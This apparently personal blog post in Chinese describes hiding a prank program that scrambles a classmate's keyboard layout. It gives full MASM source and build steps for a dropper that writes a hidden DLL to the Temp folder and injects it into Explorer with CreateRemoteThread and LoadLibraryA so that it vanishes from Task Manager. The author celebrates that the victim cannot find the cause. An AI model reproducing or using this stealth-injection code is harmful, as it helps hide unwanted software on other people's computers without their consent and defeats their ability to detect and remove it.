上次那个改变键盘布局的程序，被同学很容易的就在任务管理器里找出来杀掉了，不爽！想个办法把它藏起来。

google了一下，发现隐藏进程的方法有很多。可以用rundll，但那样任务管理器里还是会多出个进程，引起怀疑。还可以写注册表里AppInit_Dlls一项，但我试了一下，结果一改就开不了机，可能是我的dll没写好吧。再有就是注入了，代码注入很隐蔽，但还要遇到代码定位，API定位等问题，麻烦，还是dll注入好了。决定了，说干就干！

先把原来的那个程序稍做修改，然后build成dll。即加一个DllEntry就行了。

DllEntry proc hInst: HINSTANCE, reason: DWORD, reserved1: DWORD
    LOCAL @dwThreadID
    .IF reason == DLL_PROCESS_ATTACH
        push hInst
        pop inst
        invoke CreateThread, NULL, 0, addr WinMain, NULL, NULL, addr @dwThreadID
        invoke CloseHandle, eax
    .ENDIF
    mov eax, TRUE
    ret
DllEntry endp

然后
ml /c /coff /Cp test.asm
link /DLL /SUBSYSTEM:WINDOWS test.obj

这样我就有了一个test.dll，把它注入到别的进程里就行啦。为了做成一个程序，我把这个dll作为资源放到另一个程序里，在用到的时候把它释放出来。编辑test.rc，写入一行：

1000 RCDATA hookx.dll

然后rc test.rc就得到了test.res，一会儿link的时候用。

下面就是写主程序了。程序中首先找到资源，把它释放到windows的temp文件夹下，并指定隐藏属性（为了隐蔽嘛）。然后就是FindWindow，找到资源管理器（找它是因为几乎所有系统中都会开这个进程嘛），打开，申请空间，写入LoadLibraryA的地址，CreateRemoteThread建立远程线程就OK了。

这里有一点要注意的就是，建立了远程线程之后要让该线程马上返回，否则被注入的程序就会一直等待，这也就是为什么我在DllEntry中又用了一个CreateThread的原因。

下面就是源程序了，就是连续调用一堆函数，也没注释，没做返回值的检查，崩溃了就不管喽！

.386
.model flat, stdcall
option casemap: none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

rcID equ 1000

.const
szKerdll db 'kernel32.dll', 0
szHookxdll db 'hookx.dll', 0
szDesktopClass db 'Progman', 0
szDesktopWindow db 'Program Manager', 0
szLoadlib db 'LoadLibraryA', 0

.data
szBuf db 256 dup(0)
szTempPath db 256 dup(0)
szFmt db '%s%s', 0

.data?
hInstance dd ?
hResInfo dd ?
hResData dd ?
lpResData dd ?
dwResDataLen dd ?
hHookxdll dd ?
dwWrote dd ?
dwProcessID dd ?
hProcess dd ?
lpCodeRemote dd ?

.code
start:
    invoke GetModuleHandle, NULL
    mov hInstance, eax
    invoke FindResource, hInstance, rcID, RT_RCDATA
    mov hResInfo, eax
    invoke LoadResource, hInstance, hResInfo
    mov hResData, eax
    invoke LockResource, hResData
    mov lpResData, eax
    invoke SizeofResource, hInstance, hResInfo
    mov dwResDataLen, eax
    invoke GetTempPath, SIZEOF szTempPath, OFFSET szTempPath
    invoke wsprintf, OFFSET szBuf, OFFSET szFmt, OFFSET szTempPath, OFFSET szHookxdll
    invoke CreateFile, OFFSET szBuf, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL or FILE_ATTRIBUTE_HIDDEN, 0
    mov hHookxdll, eax
    invoke WriteFile, hHookxdll, lpResData, dwResDataLen, OFFSET dwWrote, NULL
    invoke FindWindow, OFFSET szDesktopClass, OFFSET szDesktopWindow
    invoke GetWindowThreadProcessId, eax, OFFSET dwProcessID
    invoke OpenProcess, PROCESS_ALL_ACCESS, FALSE, dwProcessID
    mov hProcess, eax
    invoke VirtualAllocEx, hProcess, 0, SIZEOF szBuf, MEM_COMMIT, PAGE_EXECUTE_READWRITE
    mov lpCodeRemote, eax
    invoke WriteProcessMemory, hProcess, lpCodeRemote, OFFSET szBuf, SIZEOF szBuf, NULL
    invoke LoadLibrary, OFFSET szKerdll
    invoke GetProcAddress, eax, OFFSET szLoadlib
    invoke CreateRemoteThread, hProcess, 0, 0, eax, lpCodeRemote, 0, 0
    invoke CloseHandle, eax
    invoke CloseHandle, hProcess
    invoke ExitProcess, 0

end start

好了，编译连接一下，这回再运行，按alt+ctrl+del看一下，哈哈，没有任何迹象，成功！这回他该纳闷了，我的键盘怎么又不好使了？？